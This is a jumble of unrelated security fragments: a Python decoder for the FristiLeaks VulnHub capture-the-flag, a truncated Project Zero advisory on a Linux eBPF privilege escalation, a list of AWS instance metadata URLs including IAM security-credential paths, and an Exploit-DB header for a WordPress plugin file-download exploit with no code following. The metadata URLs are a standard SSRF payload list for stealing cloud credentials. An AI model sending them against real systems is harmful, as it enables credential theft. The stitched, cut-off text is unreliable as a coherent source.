#!/usr/bin/python
# Wrote this simple function to solve the CTF designed for FristiLeaks v1.3 VulnHub VM
import base64, codecs, sys

def decodeString(encoded):
    # Reverse the string, undo ROT13, then base64-decode the result
    decode = codecs.decode(encoded[::-1], 'rot13')
    return base64.b64decode(decode)

cryptoResult = decodeString(sys.argv[1])
print(cryptoResult.decode())
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=808
In Linux >=4.4, when the CONFIG_BPF_SYSCALL config option is set and the
kernel.unprivileged_bpf_disabled sysctl is not explicitly set to 1 at runtime,
unprivileged code can use the bpf() syscall to load eBPF socket filter programs.
These conditions are fulfilled in Ubuntu 16.04.
When an eBPF program is loaded using bpf(BPF_PROG_LOAD, ...), the first
function that touches the supplied eBPF instructions is
replace_map_fd_with_map_ptr(), which looks for instructions that reference eBPF
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
#!/usr/bin/env python
# Exploit Title: Advanced-Video-Embed Arbitrary File Download / Unauthenticated Post Creation
# Google Dork: N/A
# Date: 04/01/2016
# Exploit Author: evait security GmbH
# Vendor Homepage: arshmultani - http://dscom.it/
# Software Link: https://wordpress.org/plugins/advanced-video-embed-embed-videos-or-playlists/
# Version: 1.0
# Tested on: Linux Apache / Wordpress 4.2.2